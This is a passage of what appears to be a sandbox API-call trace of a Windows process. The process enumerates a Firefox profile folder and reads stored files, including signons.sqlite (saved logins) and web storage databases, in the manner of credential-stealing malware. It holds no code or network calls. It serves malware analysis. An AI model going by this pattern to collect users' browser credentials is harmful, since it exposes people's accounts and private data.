"c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.020] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x50000 [0590.020] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.020] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x24c0000 [0590.022] UnmapViewOfFile (lpBaseAddress=0x24c0000) returned 1 [0590.023] CloseHandle (hObject=0x668) returned 1 [0590.023] CloseHandle (hObject=0x660) returned 1 [0590.023] LocalFree (hMem=0x56c300) returned 0x0 [0590.024] LocalFree (hMem=0x56afc8) returned 0x0 [0590.024] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0590.024] lstrlenW (lpString="\\") returned 1 [0590.024] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.024] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0590.024] lstrlenW (lpString="times.json") returned 10 [0590.024] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.024] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x5e1d10 [0590.024] LocalFree (hMem=0x578c30) returned 0x0 [0590.024] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.024] CloseHandle (hObject=0x660) returned 1 [0590.024] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x57 [0590.024] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x578c30 [0590.024] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x578c30, nSize=0x57 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json") returned 0x57 [0590.024] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.024] CloseHandle (hObject=0x660) returned 1 [0590.024] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.024] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d [0590.024] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.024] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.025] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.025] CloseHandle (hObject=0x668) returned 1 [0590.025] CloseHandle (hObject=0x660) returned 1 [0590.025] LocalFree (hMem=0x578c30) returned 0x0 [0590.025] LocalFree (hMem=0x5e1d10) returned 0x0 [0590.025] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0590.025] lstrlenW (lpString="\\") returned 1 [0590.025] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.025] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0590.025] lstrlenW (lpString="urlclassifierkey3.txt") returned 21 [0590.025] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.025] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x5e1d10 [0590.025] LocalFree (hMem=0x578c30) returned 0x0 [0590.025] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.025] CloseHandle (hObject=0x660) returned 1 [0590.025] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x62 [0590.025] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x5e1e60 [0590.025] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x5e1e60, nSize=0x62 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt") returned 0x62 [0590.025] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.025] CloseHandle (hObject=0x660) returned 1 [0590.025] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.025] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9a [0590.025] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.025] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.026] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.026] CloseHandle (hObject=0x668) returned 1 [0590.026] CloseHandle (hObject=0x660) returned 1 [0590.026] LocalFree (hMem=0x5e1e60) returned 0x0 [0590.026] LocalFree (hMem=0x5e1d10) returned 0x0 [0590.026] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0590.026] lstrcmpiW (lpString1="weave", lpString2=".") returned 1 [0590.026] lstrcmpiW (lpString1="weave", lpString2="..") returned 1 [0590.026] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.026] lstrlenW (lpString="\\") returned 1 [0590.026] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.026] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0590.026] lstrlenW (lpString="weave") returned 5 [0590.026] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.026] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x5e1d10 [0590.026] LocalFree (hMem=0x578c30) returned 0x0 [0590.026] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.026] lstrlenW (lpString="\\*.*") returned 4 [0590.026] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.026] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x578c30 [0590.026] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\*.*", lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 0x5b9b50 [0590.026] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.026] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 1 [0590.026] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.026] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.026] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 1 [0590.027] lstrcmpiW (lpString1="changes", lpString2=".") returned 1 [0590.027] lstrcmpiW (lpString1="changes", lpString2="..") returned 1 [0590.027] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.027] lstrlenW (lpString="\\") returned 1 [0590.027] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.027] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x5e1e40 [0590.027] lstrlenW (lpString="changes") returned 7 [0590.027] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.027] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0590.027] LocalFree (hMem=0x5e1e40) returned 0x0 [0590.027] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0590.027] lstrlenW (lpString="\\*.*") returned 4 [0590.027] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0590.027] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0590.027] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes\\*.*", lpFindFileData=0x52d624 | out: lpFindFileData=0x52d624) returned 0x5b9b10 [0590.027] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.027] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d624 | out: lpFindFileData=0x52d624) returned 1 [0590.027] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.027] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.027] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d624 | out: lpFindFileData=0x52d624) returned 0 [0590.027] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.027] LocalFree (hMem=0x56c300) returned 0x0 [0590.027] LocalFree (hMem=0x56afc8) returned 0x0 [0590.027] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 1 [0590.027] lstrcmpiW (lpString1="failed", lpString2=".") returned 1 [0590.027] lstrcmpiW (lpString1="failed", lpString2="..") returned 1 [0590.027] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.027] lstrlenW (lpString="\\") returned 1 [0590.027] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.027] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x5e1e40 [0590.027] lstrlenW (lpString="failed") returned 6 [0590.027] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.027] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56afc8 [0590.027] LocalFree (hMem=0x5e1e40) returned 0x0 [0590.027] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0590.027] lstrlenW (lpString="\\*.*") returned 4 [0590.027] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0590.027] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0590.027] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed\\*.*", lpFindFileData=0x52d624 | out: lpFindFileData=0x52d624) returned 0x5b9b10 [0590.027] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.027] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d624 | out: lpFindFileData=0x52d624) returned 1 [0590.027] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.027] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.027] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d624 | out: lpFindFileData=0x52d624) returned 0 [0590.028] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.028] LocalFree (hMem=0x56c300) returned 0x0 [0590.028] LocalFree (hMem=0x56afc8) returned 0x0 [0590.028] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 1 [0590.028] lstrcmpiW (lpString1="toFetch", lpString2=".") returned 1 [0590.028] lstrcmpiW (lpString1="toFetch", lpString2="..") returned 1 [0590.028] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.028] lstrlenW (lpString="\\") returned 1 [0590.028] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.028] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x5e1e40 [0590.028] lstrlenW (lpString="toFetch") returned 7 [0590.028] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.028] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0590.028] LocalFree (hMem=0x5e1e40) returned 0x0 [0590.028] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0590.028] lstrlenW (lpString="\\*.*") returned 4 [0590.028] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0590.028] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0590.028] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch\\*.*", lpFindFileData=0x52d624 | out: lpFindFileData=0x52d624) returned 0x5b9b10 [0590.028] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.028] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d624 | out: lpFindFileData=0x52d624) returned 1 [0590.028] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.028] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.028] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d624 | out: lpFindFileData=0x52d624) returned 0 [0590.028] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.028] LocalFree (hMem=0x56c300) returned 0x0 [0590.028] LocalFree (hMem=0x56afc8) returned 0x0 [0590.028] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 0 [0590.028] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.028] LocalFree (hMem=0x578c30) returned 0x0 [0590.028] LocalFree (hMem=0x5e1d10) returned 0x0 [0590.028] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0590.028] lstrcmpiW (lpString1="webapps", lpString2=".") returned 1 [0590.028] lstrcmpiW (lpString1="webapps", lpString2="..") returned 1 [0590.028] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.028] lstrlenW (lpString="\\") returned 1 [0590.028] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.028] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0590.028] lstrlenW (lpString="webapps") returned 7 [0590.028] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.028] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x5e1d10 [0590.028] LocalFree (hMem=0x578c30) returned 0x0 [0590.028] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.028] lstrlenW (lpString="\\*.*") returned 4 [0590.028] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.028] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x578c30 [0590.029] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\*.*", lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 0x5b9b50 [0590.029] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.029] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 1 [0590.029] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.029] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.029] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 1 [0590.029] lstrlenW (lpString="\\") returned 1 [0590.029] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.029] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x5e1e40 [0590.029] lstrlenW (lpString="webapps.json") returned 12 [0590.029] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\") returned 84 [0590.029] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5a2988 [0590.029] LocalFree (hMem=0x5e1e40) returned 0x0 [0590.029] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.029] CloseHandle (hObject=0x668) returned 1 [0590.029] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0590.029] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5e1e40 [0590.029] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x5e1e40, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json") returned 0x61 [0590.029] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.029] CloseHandle (hObject=0x668) returned 1 [0590.029] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.029] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2 [0590.029] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.029] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.029] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.030] CloseHandle (hObject=0x66c) returned 1 [0590.030] CloseHandle (hObject=0x668) returned 1 [0590.030] LocalFree (hMem=0x5e1e40) returned 0x0 [0590.030] LocalFree (hMem=0x5a2988) returned 0x0 [0590.030] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 0 [0590.030] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.030] LocalFree (hMem=0x578c30) returned 0x0 [0590.030] LocalFree (hMem=0x5e1d10) returned 0x0 [0590.030] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0590.030] lstrlenW (lpString="\\") returned 1 [0590.030] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.030] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0590.030] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0590.030] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.030] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56afc8 [0590.030] LocalFree (hMem=0x578c30) returned 0x0 [0590.030] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.030] CloseHandle (hObject=0x660) returned 1 [0590.030] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0590.030] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56c300 [0590.030] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x56c300, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite") returned 0x60 [0590.030] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.030] CloseHandle (hObject=0x660) returned 1 [0590.030] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.030] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0590.030] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.030] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.031] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.032] CloseHandle (hObject=0x668) returned 1 [0590.032] CloseHandle (hObject=0x660) returned 1 [0590.032] LocalFree (hMem=0x56c300) returned 0x0 [0590.032] LocalFree (hMem=0x56afc8) returned 0x0 [0590.032] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 0 [0590.032] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.032] LocalFree (hMem=0x59a8a0) returned 0x0 [0590.032] LocalFree (hMem=0x578b10) returned 0x0 [0590.032] FindNextFileW (in: 